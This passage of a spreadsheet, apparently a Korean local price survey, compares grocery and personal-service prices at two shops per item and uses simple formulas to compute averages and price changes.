A30: 24 | B30: 명태 | C30: 40cm 1마리 | D30: =COUNTIF(J30,"<>0")+COUNTIF(N30,"<>0") -> 1 | E30: =COUNTIF(K30,"<>0")+COUNTIF(O30,"<>0") -> 1 | F30: =IF(D30=0,0,SUM(J30,N30)/D30) -> 3,800 | G30: =IF(E30=0,0,SUM(K30,O30)/E30) -> 3,800 | H30: =G30-F30 -> 0 | I30: 농협하나로마트 | J30: 3,800 | K30: 3,800 | L30: =K30-J30 -> 0 | M30: 트라이얼코리아 | N30: 0 | O30: 0 | P30: =O30-N30 -> 0
A31: 25 | B31: 고등어 | C31: 30cm 1마리 | D31: =COUNTIF(J31,"<>0")+COUNTIF(N31,"<>0") -> 1 | E31: =COUNTIF(K31,"<>0")+COUNTIF(O31,"<>0") -> 1 | F31: =IF(D31=0,0,SUM(J31,N31)/D31) -> 2,800 | G31: =IF(E31=0,0,SUM(K31,O31)/E31) -> 2,800 | H31: =G31-F31 -> 0 | I31: 농협하나로마트 | J31: 2,800 | K31: 2,800 | L31: =K31-J31 -> 0 | M31: 트라이얼코리아 | N31: 0 | O31: 0 | P31: =O31-N31 -> 0
A32: 26 | B32: 냉동오징어 | C32: 30cm 1마리 | D32: =COUNTIF(J32,"<>0")+COUNTIF(N32,"<>0") -> 1 | E32: =COUNTIF(K32,"<>0")+COUNTIF(O32,"<>0") -> 1 | F32: =IF(D32=0,0,SUM(J32,N32)/D32) -> 5,000 | G32: =IF(E32=0,0,SUM(K32,O32)/E32) -> 6,000 | H32: =G32-F32 -> 1,000 | I32: 농협하나로마트 | J32: 5,000 | K32: 6,000 | L32: =K32-J32 -> 1,000 | M32: 트라이얼코리아 | N32: 0 | O32: 0 | P32: =O32-N32 -> 0
A33: 27 | B33: 콩 | C33: 상품 1kg | D33: =COUNTIF(J33,"<>0")+COUNTIF(N33,"<>0") -> 0 | E33: =COUNTIF(K33,"<>0")+COUNTIF(O33,"<>0") -> 0 | F33: =IF(D33=0,0,SUM(J33,N33)/D33) -> 0 | G33: =IF(E33=0,0,SUM(K33,O33)/E33) -> 0 | H33: =G33-F33 -> 0 | I33: 농협하나로마트 | J33: 0 | K33: 0 | L33: =K33-J33 -> 0 | M33: 트라이얼코리아 | N33: 0 | O33: 0 | P33: =O33-N33 -> 0
A34: 28 | B34: 고춧가루 | C34: 상품 3kg | D34: =COUNTIF(J34,"<>0")+COUNTIF(N34,"<>0") -> 2 | E34: =COUNTIF(K34,"<>0")+COUNTIF(O34,"<>0") -> 2 | F34: =IF(D34=0,0,SUM(J34,N34)/D34) -> 99,450 | G34: =IF(E34=0,0,SUM(K34,O34)/E34) -> 99,450 | H34: =G34-F34 -> 0 | I34: 농협하나로마트 | J34: 115,200 | K34: 115,200 | L34: =K34-J34 -> 0 | M34: 트라이얼코리아 | N34: 83,700 | O34: 83,700 | P34: =O34-N34 -> 0
A35: 개인서비스 요금(49개 품목) | F35: 0
A36: 1 | B36: 설렁탕 | C36: 1인분 (보통) | D36: =COUNTIF(J36,"<>0")+COUNTIF(N36,"<>0") -> 2 | E36: =COUNTIF(K36,"<>0")+COUNTIF(O36,"<>0") -> 2 | F36: =IF(D36=0,0,SUM(J36,N36)/D36) -> 9,500 | G36: =IF(E36=0,0,SUM(K36,O36)/E36) -> 9,500 | H36: 0 | I36: 함흥냉면 | J36: 9000 | K36: 9000 | L36: =K36-J36 -> 0 | M36: 투가리국밥 | N36: 10,000 | O36: 10,000 | P36: =O36-N36 -> 0
A37: 2 | B37: 냉면 | C37: 물냉면, 1인분(보통) | D37: =COUNTIF(J37,"<>0")+COUNTIF(N37,"<>0") -> 2 | E37: =COUNTIF(K37,"<>0")+COUNTIF(O37,"<>0") -> 2 | F37: =IF(D37=0,0,SUM(J37,N37)/D37) -> 9,500 | G37: =IF(E37=0,0,SUM(K37,O37)/E37) -> 9,500 | H37: 0 | I37: 함흥냉면 | J37: 10000 | K37: 10000 | L37: =K37-J37 -> 0 | M37: 호호냉면 | N37: 9,000 | O37: 9,000 | P37: =O37-N37 -> 0
A38: 3 | B38: 비빔밥 | C38: 1인분(보통) | D38: =COUNTIF(J38,"<>0")+COUNTIF(N38,"<>0") -> 2 | E38: =COUNTIF(K38,"<>0")+COUNTIF(O38,"<>0") -> 2 | F38: =IF(D38=0,0,SUM(J38,N38)/D38) -> 8,000 | G38: =IF(E38=0,0,SUM(K38,O38)/E38) -> 8,000 | H38: 0 | I38: 남일보리밥 | J38: 10000 | K38: 10000 | L38: =K38-J38 -> 0 | M38: 이파리 | N38: 6,000 | O38: 6,000 | P38: =O38-N38 -> 0
A39: 4 | B39: 갈비탕 | C39: 1인분(보통) | D39: =COUNTIF(J39,"<>0")+COUNTIF(N39,"<>0") -> 2 | E39: =COUNTIF(K39,"<>0")+COUNTIF(O39,"<>0") -> 2 | F39: =IF(D39=0,0,SUM(J39,N39)/D39) -> 13,500 | G39: =IF(E39=0,0,SUM(K39,O39)/E39) -> 13,500 | H39: 0 | I39: 호호냉면 | J39: 12000 | K39: 12000 | L39: =K39-J39 -> 0 | M39: 투가리국밥 | N39: 15,000 | O39: 15,000 | P39: =O39-N39 -> 0
A40: 5 | B40: 삼계탕 | C40: 1인분(보통) | D40: =COUNTIF(J40,"<>0")+COUNTIF(N40,"<>0") -> 2 | E40: =COUNTIF(K40,"<>0")+COUNTIF(O40,"<>0") -> 2 | F40: =IF(D40=0,0,SUM(J40,N40)/D40) -> 13,500 | G40: =IF(E40=0,0,SUM(K40,O40)/E40) -> 13,500 | H40: =G40-F40 -> 0 | I40: 고려삼계탕 | J40: 14000 | K40: 14000 | L40: =K40-J40 -> 0 | M40: 마로정 | N40: 13,000 | O40: 13,000 | P40: =O40-N40 -> 0
A41: 6 | B41: 된장찌개 백반 | C41: 1인분(보통) | D41: =COUNTIF(J41,"<>0")+COUNTIF(N41,"<>0") -> 2 | E41: =COUNTIF(K41,"<>0")+COUNTIF(O41,"<>0") -> 2 | F41: =IF(D41=0,0,SUM(J41,N41)/D41) -> 7,750 | G41: =IF(E41=0,0,SUM(K41,O41)/E41) -> 7,750 | H41: =G41-F41 -> 0 | I41: 낙지뻘식당 | J41: 9000 | K41: 9000 | L41: =K41-J41 -> 0 | M41: 이파리 | N41: 6,500 | O41: 6,500 | P41: =O41-N41 -> 0
A42: 7 | B42: 김치찌개 백반 | C42: 1인분(보통) | D42: =COUNTIF(J42,"<>0")+COUNTIF(N42,"<>0") -> 2 | E42: =COUNTIF(K42,"<>0")+COUNTIF(O42,"<>0") -> 2 | F42: =IF(D42=0,0,SUM(J42,N42)/D42) -> 7,750 | G42: =IF(E42=0,0,SUM(K42,O42)/E42) -> 7,750 | H42: =G42-F42 -> 0 | I42: 낙지뻘식당 | J42: 9000 | K42: 9000 | L42: =K42-J42 -> 0 | M42: 이파리 | N42: 6,500 | O42: 6,500 | P42: =O42-N42 -> 0
A43: 8 | B43: 불고기 | C43: 1인분(200g) 공기밥 제외 | D43: =COUNTIF(J43,"<>0")+COUNTIF(N43,"<>0") -> 2 | E43: =COUNTIF(K43,"<>0")+COUNTIF(O43,"<>0") -> 2 | F43: =IF(D43=0,0,SUM(J43,N43)/D43) -> 29,222 | G43: =IF(E43=0,0,SUM(K43,O43)/E43) -> 30,555 | H43: =G43-F43 -> 1,333 | I43: 시내식당 | J43: 27777 | K43: 27777 | L43: =K43-J43 -> 0 | M43: 한라산식당 | N43: 30,666 | O43: 33,332 | P43: =O43-N43 -> 2,666
A44: 9 | B44: 등심구이 | C44: 1인분(200g) 공기밥 제외 | D44: =COUNTIF(J44,"<>0")+COUNTIF(N44,"<>0") -> 2 | E44: =COUNTIF(K44,"<>0")+COUNTIF(O44,"<>0") -> 2 | F44: =IF(D44=0,0,SUM(J44,N44)/D44) -> 42,000 | G44: =IF(E44=0,0,SUM(K44,O44)/E44) -> 42,000 | H44: =G44-F44 -> 0 | I44: 화담정 | J44: 33333 | K44: 33333 | L44: =K44-J44 -> 0 | M44: 순한우촌 | N44: 50,666 | O44: 50,666 | P44: =O44-N44 -> 0
A45: 10 | B45: 생선초밥 | C45: 1인분(보통), 활어기준 | D45: =COUNTIF(J45,"<>0")+COUNTIF(N45,"<>0") -> 1 | E45: =COUNTIF(K45,"<>0")+COUNTIF(O45,"<>0") -> 1 | F45: =IF(D45=0,0,SUM(J45,N45)/D45) -> 17,000 | G45: =IF(E45=0,0,SUM(K45,O45)/E45) -> 17,000 | H45: =G45-F45 -> 0 | I45: 초밥이야기 | J45: 17,000 | K45: 17,000 | L45: =K45-J45 -> 0 | N45: 0 | O45: 0 | P45: =O45-N45 -> 0
A46: 11 | B46: 튀김닭 | C46: 양념통닭 1마리 | D46: =COUNTIF(J46,"<>0")+COUNTIF(N46,"<>0") -> 2 | E46: =COUNTIF(K46,"<>0")+COUNTIF(O46,"<>0") -> 2 | F46: =IF(D46=0,0,SUM(J46,N46)/D46) -> 18,500 | G46: =IF(E46=0,0,SUM(K46,O46)/E46) -> 18,500 | H46: =G46-F46 -> 0 | I46: 처가집치킨 | J46: 19000 | K46: 19000 | L46: =K46-J46 -> 0 | M46: 굽네치킨 | N46: 18,000 | O46: 18,000 | P46: =O46-N46 -> 0
A47: 12 | B47: 칼국수 | C47: 1인분(보통) | D47: =COUNTIF(J47,"<>0")+COUNTIF(N47,"<>0") -> 2 | E47: =COUNTIF(K47,"<>0")+COUNTIF(O47,"<>0") -> 2 | F47: =IF(D47=0,0,SUM(J47,N47)/D47) -> 7,500 | G47: =IF(E47=0,0,SUM(K47,O47)/E47) -> 7,500 | H47: =G47-F47 -> 0 | I47: 만나칼국수 | J47: 8000 | K47: 8000 | L47: =K47-J47 -> 0 | M47: 화영칼국수 | N47: 7,000 | O47: 7,000 | P47: =O47-N47 -> 0
A48: 13 | B48: 조리라면 | C48: 분식점 1인분 | D48: =COUNTIF(J48,"<>0")+COUNTIF(N48,"<>0") -> 2 | E48: =COUNTIF(K48,"<>0")+COUNTIF(O48,"<>0") -> 2 | F48: =IF(D48=0,0,SUM(J48,N48)/D48) -> 4,250 | G48: =IF(E48=0,0,SUM(K48,O48)/E48) -> 4,250 | H48: =G48-F48 -> 0 | I48: 정가네김밥 | J48: 4500 | K48: 4500 | L48: =K48-J48 -> 0 | M48: 이파리 | N48: 4,000 | O48: 4,000 | P48: =O48-N48 -> 0
A49: 14 | B49: 김밥 | C49: 분식점 1인분 | D49: =COUNTIF(J49,"<>0")+COUNTIF(N49,"<>0") -> 2 | E49: =COUNTIF(K49,"<>0")+COUNTIF(O49,"<>0") -> 2 | F49: =IF(D49=0,0,SUM(J49,N49)/D49) -> 3,000 | G49: =IF(E49=0,0,SUM(K49,O49)/E49) -> 3,000 | H49: =G49-F49 -> 0 | I49: 정가네김밥 | J49: 3500 | K49: 3500 | L49: =K49-J49 -> 0 | M49: 이파리 | N49: 2,500 | O49: 2,500 | P49: =O49-N49 -> 0
A50: 15 | B50: 짜장면 | C50: 1인분(보통) | D50: =COUNTIF(J50,"<>0")+COUNTIF(N50,"<>0") -> 2 | E50: =COUNTIF(K50,"<>0")+COUNTIF(O50,"<>0") -> 2 | F50: =IF(D50=0,0,SUM(J50,N50)/D50) -> 6,000 | G50: =IF(E50=0,0,SUM(K50,O50)/E50) -> 6,000 | H50: =G50-F50 -> 0 | I50: 연경 | J50: 6000 | K50: 6000 | L50: =K50-J50 -> 0 | M50: 청해루 | N50: 6,000 | O50: 6,000 | P50: =O50-N50 -> 0
A51: 16 | B51: 짬뽕 | C51: 1인분(보통) | D51: =COUNTIF(J51,"<>0")+COUNTIF(N51,"<>0") -> 2 | E51: =COUNTIF(K51,"<>0")+COUNTIF(O51,"<>0") -> 2 | F51: =IF(D51=0,0,SUM(J51,N51)/D51) -> 8,000 | G51: =IF(E51=0,0,SUM(K51,O51)/E51) -> 8,000 | H51: =G51-F51 -> 0 | I51: 연경 | J51: 8000 | K51: 8000 | L51: =K51-J51 -> 0 | M51: 청해루 | N51: 8,000 | O51: 8,000 | P51: =O51-N51 -> 0
A52: 17 | B52: 탕수육 | C52: 일반탕수육(보통) | D52: =COUNTIF(J52,"<>0")+COUNTIF(N52,"<>0") -> 2 | E52: =COUNTIF(K52,"<>0")+COUNTIF(O52,"<>0") -> 2 | F52: =IF(D52=0,0,SUM(J52,N52)/D52) -> 21,000 | G52: =IF(E52=0,0,SUM(K52,O52)/E52) -> 21,000 | H52: =G52-F52 -> 0 | I52: 연경 | J52: 22000 | K52: 22000 | L52: =K52-J52 -> 0 | M52: 청해루 | N52: 20,000 | O52: 20,000 | P52: =O52-N52 -> 0
A53: 18 | B53: 돈가스 | C53: 일반돈가스,1인분 | D53: =COUNTIF(J53,"<>0")+COUNTIF(N53,"<>0") -> 2 | E53: =COUNTIF(K53,"<>0")+COUNTIF(O53,"<>0") -> 2 | F53: =IF(D53=0,0,SUM(J53,N53)/D53) -> 9,000 | G53: =IF(E53=0,0,SUM(K53,O53)/E53) -> 9,000 | H53: =G53-F53 -> 0 | I53: 행복돈가스 | J53: 9000 | K53: 9000 | L53: =K53-J53 -> 0 | M53: 마로정 | N53: 9,000 | O53: 9,000 | P53: =O53-N53 -> 0
A54: 19 | B54: 햄버거 | C54: 기본형(야채,고기) | D54: =COUNTIF(J54,"<>0")+COUNTIF(N54,"<>0") -> 2 | E54: =COUNTIF(K54,"<>0")+COUNTIF(O54,"<>0") -> 2 | F54: =IF(D54=0,0,SUM(J54,N54)/D54) -> 3,550 | G54: =IF(E54=0,0,SUM(K54,O54)/E54) -> 3,550 | H54: =G54-F54 -> 0 | I54: 맘스터치 | J54: 3900 | K54: 3900 | L54: =K54-J54 -> 0 | M54: 트라이얼코리아 | N54: 3,200 | O54: 3,200 | P54: =O54-N54 -> 0
A55: 20 | B55: 피자 | C55: 기본형(야채,고기) | D55: =COUNTIF(J55,"<>0")+COUNTIF(N55,"<>0") -> 2 | E55: =COUNTIF(K55,"<>0")+COUNTIF(O55,"<>0") -> 2 | F55: =IF(D55=0,0,SUM(J55,N55)/D55) -> 18,400 | G55: =IF(E55=0,0,SUM(K55,O55)/E55) -> 18,400 | H55: =G55-F55 -> 0 | I55: 청년피자 | J55: 18900 | K55: 18900 | L55: =K55-J55 -> 0 | M55: 피자가 기가막혀 | N55: 17,900 | O55: 17,900 | P55: =O55-N55 -> 0
A56: 21 | B56: 커피(외식) | C56: 일반원두커피 | D56: =COUNTIF(J56,"<>0")+COUNTIF(N56,"<>0") -> 2 | E56: =COUNTIF(K56,"<>0")+COUNTIF(O56,"<>0") -> 2 | F56: =IF(D56=0,0,SUM(J56,N56)/D56) -> 3,000 | G56: =IF(E56=0,0,SUM(K56,O56)/E56) -> 3,000 | H56: =G56-F56 -> 0 | I56: 토프레소(창덕) | J56: 3000 | K56: 3000 | L56: =K56-J56 -> 0 | M56: 요거프레소 | N56: 3,000 | O56: 3,000 | P56: =O56-N56 -> 0
A57: 22 | B57: 국산차(외식) | C57: 녹차(티백 또는 잎녹차) | D57: =COUNTIF(J57,"<>0")+COUNTIF(N57,"<>0") -> 2 | E57: =COUNTIF(K57,"<>0")+COUNTIF(O57,"<>0") -> 2 | F57: =IF(D57=0,0,SUM(J57,N57)/D57) -> 3,900 | G57: =IF(E57=0,0,SUM(K57,O57)/E57) -> 3,900 | H57: =G57-F57 -> 0 | I57: 토프레소(창덕) | J57: 4000 | K57: 4000 | L57: =K57-J57 -> 0 | M57: 요거프레소 | N57: 3,800 | O57: 3,800 | P57: =O57-N57 -> 0
A58: 23 | B58: 삼겹살 | C58: 식육식당 200g(국내산) | D58: =COUNTIF(J58,"<>0")+COUNTIF(N58,"<>0") -> 2 | E58: =COUNTIF(K58,"<>0")+COUNTIF(O58,"<>0") -> 2 | F58: =IF(D58=0,0,SUM(J58,N58)/D58) -> 15,250 | G58: =IF(E58=0,0,SUM(K58,O58)/E58) -> 15,250 | H58: =G58-F58 -> 0 | I58: 헌라산식당 | J58: 15000 | K58: 15000 | L58: =K58-J58 -> 0 | M58: 수림정 | N58: 15,500 | O58: 15,500 | P58: =O58-N58 -> 0
A59: 24 | B59: 돼지갈비 | C59: 식육식당 200g(국내산) | D59: =COUNTIF(J59,"<>0")+COUNTIF(N59,"<>0") -> 2 | E59: =COUNTIF(K59,"<>0")+COUNTIF(O59,"<>0") -> 2 | F59: =IF(D59=0,0,SUM(J59,N59)/D59) -> 14,500 | G59: =IF(E59=0,0,SUM(K59,O59)/E59) -> 14,500 | H59: =G59-F59 -> 0 | I59: 한라산식당 | J59: 15000 | K59: 15000 | L59: =K59-J59 -> 0 | M59: 수림정 | N59: 14,000 | O59: 14,000 | P59: =O59-N59 -> 0
A60: 25 | B60: 쇠갈비 | C60: 식육식당 200g(국내산) | D60: =COUNTIF(J60,"<>0")+COUNTIF(N60,"<>0") -> 0 | E60: =COUNTIF(K60,"<>0")+COUNTIF(O60,"<>0") -> 0 | F60: =IF(D60=0,0,SUM(J60,N60)/D60) -> 0 | G60: =IF(E60=0,0,SUM(K60,O60)/E60) -> 0 | H60: =G60-F60 -> 0 | I60: 매실한우 | J60: 0 | K60: 0 | L60: =K60-J60 -> 0 | M60: 삼대불고기 | N60: 0 | O60: 0 | P60: =O60-N60 -> 0
A61: 26 | B61: 생맥주 | C61: 500CC 1잔 | D61: =COUNTIF(J61,"<>0")+COUNTIF(N61,"<>0") -> 2 | E61: =COUNTIF(K61,"<>0")+COUNTIF(O61,"<>0") -> 2 | F61: =IF(D61=0,0,SUM(J61,N61)/D61) -> 4,000 | G61: =IF(E61=0,0,SUM(K61,O61)/E61) -> 4,000 | H61: =G61-F61 -> 0 | I61: 투모아 | J61: 4000 | K61: 4000 | L61: =K61-J61 -> 0 | M61: 꼬치이야기 | N61: 4,000 | O61: 4,000 | P61: =O61-N61 -> 0
A62: 27 | B62: 공동 주택관리비 | C62: 주공 17평1개월 (공과금 제외) | D62: =COUNTIF(J62,"<>0")+COUNTIF(N62,"<>0") -> 1 | E62: =COUNTIF(K62,"<>0")+COUNTIF(O62,"<>0") -> 1 | F62: =IF(D62=0,0,SUM(J62,N62)/D62) -> 52,000 | G62: =IF(E62=0,0,SUM(K62,O62)/E62) -> 36,000 | H62: =G62-F62 -> -16,000 | I62: 목성아파트 | J62: 52000 | K62: 36000 | L62: =K62-J62 -> -16,000 | N62: 0 | O62: 0 | P62: =O62-N62 -> 0
A63: 28 | B63: 양 복 세탁료 | C63: 신사복 상·하 드라이크리닝 1회 | D63: =COUNTIF(J63,"<>0")+COUNTIF(N63,"<>0") -> 2 | E63: =COUNTIF(K63,"<>0")+COUNTIF(O63,"<>0") -> 2 | F63: =IF(D63=0,0,SUM(J63,N63)/D63) -> 8,000 | G63: =IF(E63=0,0,SUM(K63,O63)/E63) -> 8,500 | H63: =G63-F63 -> 500 | I63: 서울세탁소 | J63: 9000 | K63: 10000 | L63: =K63-J63 -> 1,000 | M63: 때빼때세탁소 | N63: 7,000 | O63: 7,000 | P63: =O63-N63 -> 0
A64: 29 | B64: 의복수선료 | C64: 신사복 바지 밑단줄임 1회 | D64: =COUNTIF(J64,"<>0")+COUNTIF(N64,"<>0") -> 2 | E64: =COUNTIF(K64,"<>0")+COUNTIF(O64,"<>0") -> 2 | F64: =IF(D64=0,0,SUM(J64,N64)/D64) -> 4,500 | G64: =IF(E64=0,0,SUM(K64,O64)/E64) -> 5,000 | H64: =G64-F64 -> 500 | I64: 서울세탁소 | J64: 4000 | K64: 5000 | L64: =K64-J64 -> 1,000 | M64: 때빼때세탁소 | N64: 5,000 | O64: 5,000 | P64: =O64-N64 -> 0
A65: 30 | B65: 영화관람요 (방화. 외화) | C65: 상영시간 100분정도 1회 (입장세,문예진흥기금포함) | D65: =COUNTIF(J65,"<>0")+COUNTIF(N65,"<>0") -> 1 | E65: =COUNTIF(K65,"<>0")+COUNTIF(O65,"<>0") -> 1 | F65: =IF(D65=0,0,SUM(J65,N65)/D65) -> 13,000 | G65: =IF(E65=0,0,SUM(K65,O65)/E65) -> 13,000 | H65: =G65-F65 -> 0 | J65: 13,000 | K65: 13,000 | L65: =K65-J65 -> 0 | N65: 0 | O65: 0 | P65: =O65-N65 -> 0
A66: 31 | B66: 경기장 입장료 | C66: 공공체육시설 (성인 1인) | D66: =COUNTIF(J66,"<>0")+COUNTIF(N66,"<>0") -> 0 | E66: =COUNTIF(K66,"<>0")+COUNTIF(O66,"<>0") -> 0 | F66: =IF(D66=0,0,SUM(J66,N66)/D66) -> 0 | G66: =IF(E66=0,0,SUM(K66,O66)/E66) -> 0 | H66: =G66-F66 -> 0 | J66: 0 | K66: 0 | L66: =K66-J66 -> 0 | N66: 0 | O66: 0 | P66: =O66-N66 -> 0
A67: 32 | B67: 수영장 이용료 | C67: 일반성인 1회 (체육기금 포함) | D67: =COUNTIF(J67,"<>0")+COUNTIF(N67,"<>0") -> 1 | E67: =COUNTIF(K67,"<>0")+COUNTIF(O67,"<>0") -> 1 | F67: =IF(D67=0,0,SUM(J67,N67)/D67) -> 3,500 | G67: =IF(E67=0,0,SUM(K67,O67)/E67) -> 3,500 | H67: =G67-F67 -> 0 | I67: 광양수영장 | J67: 3,500 | K67: 3,500 | L67: =K67-J67 -> 0 | N67: 0 | O67: 0 | P67: =O67-N67 -> 0
A68: 33 | B68: 볼링장 이용료 | C68: 일반성인 평일오후 1게임 | D68: =COUNTIF(J68,"<>0")+COUNTIF(N68,"<>0") -> 1 | E68: =COUNTIF(K68,"<>0")+COUNTIF(O68,"<>0") -> 1 | F68: =IF(D68=0,0,SUM(J68,N68)/D68) -> 4,000 | G68: =IF(E68=0,0,SUM(K68,O68)/E68) -> 4,000 | H68: =G68-F68 -> 0 | I68: 월드볼링장 | J68: 4000 | K68: 4000 | L68: =K68-J68 -> 0 | N68: 0 | O68: 0 | P68: =O68-N68 -> 0
A69: 34 | B69: 골프연습장 이용료 | C69: 초급(남자회원)1개월 (레슨비 미포함) | D69: =COUNTIF(J69,"<>0")+COUNTIF(N69,"<>0") -> 1 | E69: =COUNTIF(K69,"<>0")+COUNTIF(O69,"<>0") -> 1 | F69: =IF(D69=0,0,SUM(J69,N69)/D69) -> 100,000 | G69: =IF(E69=0,0,SUM(K69,O69)/E69) -> 100,000 | H69: =G69-F69 -> 0 | I69: 창성골프연습장 | J69: 100000 | K69: 100000 | L69: =K69-J69 -> 0 | N69: 0 | O69: 0 | P69: =O69-N69 -> 0
A70: 35 | B70: 노래방 이용료 | C70: 일반인 저녁 1시간 | D70: =COUNTIF(J70,"<>0")+COUNTIF(N70,"<>0") -> 2 | E70: =COUNTIF(K70,"<>0")+COUNTIF(O70,"<>0") -> 2 | F70: =IF(D70=0,0,SUM(J70,N70)/D70) -> 25,000 | G70: =IF(E70=0,0,SUM(K70,O70)/E70) -> 25,000 | H70: =G70-F70 -> 0 | I70: 매화노래방 | J70: 25000 | K70: 25000 | L70: =K70-J70 -> 0 | M70: 고래고래노래방 | N70: 25,000 | O70: 25,000 | P70: =O70-N70 -> 0
A71: 36 | B71: 당구장 이용료 | C71: 큐선대 일반인 저녁 1시간 | D71: =COUNTIF(J71,"<>0")+COUNTIF(N71,"<>0") -> 2 | E71: =COUNTIF(K71,"<>0")+COUNTIF(O71,"<>0") -> 2 | F71: =IF(D71=0,0,SUM(J71,N71)/D71) -> 9,000 | G71: =IF(E71=0,0,SUM(K71,O71)/E71) -> 9,000 | H71: =G71-F71 -> 0 | I71: 퀸당구장 | J71: 9000 | K71: 9000 | L71: =K71-J71 -> 0 | M71: 굿당당구장 | N71: 9,000 | O71: 9,000 | P71: =O71-N71 -> 0
A72: 37 | B72: 사진촬영료 | C72: 칼라 반명함 1조 (상급사진관 3x4) | D72: =COUNTIF(J72,"<>0")+COUNTIF(N72,"<>0") -> 2 | E72: =COUNTIF(K72,"<>0")+COUNTIF(O72,"<>0") -> 2 | F72: =IF(D72=0,0,SUM(J72,N72)/D72) -> 22,500 | G72: =IF(E72=0,0,SUM(K72,O72)/E72) -> 22,500 | H72: =G72-F72 -> 0 | I72: 니콘사진관 | J72: 20000 | K72: 20000 | L72: =K72-J72 -> 0 | M72: 신가스튜디오 | N72: 25,000 | O72: 25,000 | P72: =O72-N72 -> 0
A73: 38 | B73: 사진인화료 | C73: 디지털사진인화요금, 현상료 포함 | D73: =COUNTIF(J73,"<>0")+COUNTIF(N73,"<>0") -> 2 | E73: =COUNTIF(K73,"<>0")+COUNTIF(O73,"<>0") -> 2 | F73: =IF(D73=0,0,SUM(J73,N73)/D73) -> 400 | G73: =IF(E73=0,0,SUM(K73,O73)/E73) -> 400 | H73: =G73-F73 -> 0 | I73: 니콘사진관 | J73: 300 | K73: 300 | L73: =K73-J73 -> 0 | M73: 신가스튜디오 | N73: 500 | O73: 500 | P73: =O73-N73 -> 0
A74: 39 | B74: 영상매체대여료 | C74: 최신판 영화 DVD대여요금 | D74: =COUNTIF(J74,"<>0")+COUNTIF(N74,"<>0") -> 0 | E74: =COUNTIF(K74,"<>0")+COUNTIF(O74,"<>0") -> 0 | F74: =IF(D74=0,0,SUM(J74,N74)/D74) -> 0 | G74: =IF(E74=0,0,SUM(K74,O74)/E74) -> 0 | H74: =G74-F74 -> 0 | J74: 0 | K74: 0 | L74: =K74-J74 -> 0 | N74: 0 | O74: 0 | P74: =O74-N74 -> 0
A75: 40 | B75: 이용료(컷트) | C75: 성인조발 중류급 1회 | D75: =COUNTIF(J75,"<>0")+COUNTIF(N75,"<>0") -> 2 | E75: =COUNTIF(K75,"<>0")+COUNTIF(O75,"<>0") -> 2 | F75: =IF(D75=0,0,SUM(J75,N75)/D75) -> 15,000 | G75: =IF(E75=0,0,SUM(K75,O75)/E75) -> 15,000 | H75: =G75-F75 -> 0 | I75: 광양이용원 | J75: 15000 | K75: 15000 | L75: =K75-J75 -> 0 | M75: 늘푸른이용원 | N75: 15,000 | O75: 15,000 | P75: =O75-N75 -> 0
A76: 41 | B76: 미용료 | C76: 성인여자 파마(일반) | D76: =COUNTIF(J76,"<>0")+COUNTIF(N76,"<>0") -> 2 | E76: =COUNTIF(K76,"<>0")+COUNTIF(O76,"<>0") -> 2 | F76: =IF(D76=0,0,SUM(J76,N76)/D76) -> 45,000 | G76: =IF(E76=0,0,SUM(K76,O76)/E76) -> 45,000 | H76: =G76-F76 -> 0 | I76: 리헤어피카소 | J76: 50000 | K76: 50000 | L76: =K76-J76 -> 0 | M76: 지샾미용실 | N76: 40,000 | O76: 40,000 | P76: =O76-N76 -> 0
A77: 42 | B77: 목욕료 (성인) | C77: 대중탕(성인 1회) (1회용품 제외) | D77: =COUNTIF(J77,"<>0")+COUNTIF(N77,"<>0") -> 2 | E77: =COUNTIF(K77,"<>0")+COUNTIF(O77,"<>0") -> 2 | F77: =IF(D77=0,0,SUM(J77,N77)/D77) -> 7,000 | G77: =IF(E77=0,0,SUM(K77,O77)/E77) -> 7,000 | H77: =G77-F77 -> 0 | I77: 삼보천 | J77: 7000 | K77: 7000 | L77: =K77-J77 -> 0 | M77: 밭샘사우나 | N77: 7,000 | O77: 7,000 | P77: =O77-N77 -> 0
A78: 43 | B78: 숙박료 (호텔) | C78: 평일, 스탠다드,부가세 및 봉사료 포함 | D78: =COUNTIF(J78,"<>0")+COUNTIF(N78,"<>0") -> 0 | E78: =COUNTIF(K78,"<>0")+COUNTIF(O78,"<>0") -> 0 | F78: =IF(D78=0,0,SUM(J78,N78)/D78) -> 0 | G78: =IF(E78=0,0,SUM(K78,O78)/E78) -> 0 | H78: =G78-F78 -> 0 | J78: 0 | K78: 0 | L78: =K78-J78 -> 0 | N78: 0 | O78: 0 | P78: =O78-N78 -> 0
A79: 44 | B79: 숙박료 (여관) | C79: 독방, 1박, 욕탕부설 | D79: =COUNTIF(J79,"<>0")+COUNTIF(N79,"<>0") -> 2 | E79: =COUNTIF(K79,"<>0")+COUNTIF(O79,"<>0") -> 2 | F79: =IF(D79=0,0,SUM(J79,N79)/D79) -> 37,500 | G79: =IF(E79=0,0,SUM(K79,O79)/E79) -> 37,500 | H79: =G79-F79 -> 0 | I79: 대산모텔 | J79: 35000 | K79: 35000 | L79: =K79-J79 -> 0 | M79: 타워모텔 | N79: 40,000 | O79: 40,000 | P79: =O79-N79 -> 0
A80: 45 | B80: 콘도미니엄 이용료 | C80: 25평정도 회원기준 1실 1일 사용 | D80: =COUNTIF(J80,"<>0")+COUNTIF(N80,"<>0") -> 0 | E80: =COUNTIF(K80,"<>0")+COUNTIF(O80,"<>0") -> 0 | F80: =IF(D80=0,0,SUM(J80,N80)/D80) -> 0 | G80: =IF(E80=0,0,SUM(K80,O80)/E80) -> 0 | H80: =G80-F80 -> 0 | J80: 0 | K80: 0 | L80: =K80-J80 -> 0 | N80: 0 | O80: 0 | P80: =O80-N80 -> 0
A81: 46 | B81: PC방 이용료 | C81: 1회 이용시 | D81: =COUNTIF(J81,"<>0")+COUNTIF(N81,"<>0") -> 2 | E81: =COUNTIF(K81,"<>0")+COUNTIF(O81,"<>0") -> 2 | F81: =IF(D81=0,0,SUM(J81,N81)/D81) -> 1,350 | G81: =IF(E81=0,0,SUM(K81,O81)/E81) -> 1,500 | H81: =G81-F81 -> 150 | I81: 미스터케이PC | J81: 1200 | K81: 1500 | L81: =K81-J81 -> 300 | M81: 아이센스PC방 | N81: 1,500 | O81: 1,500 | P81: =O81-N81 -> 0
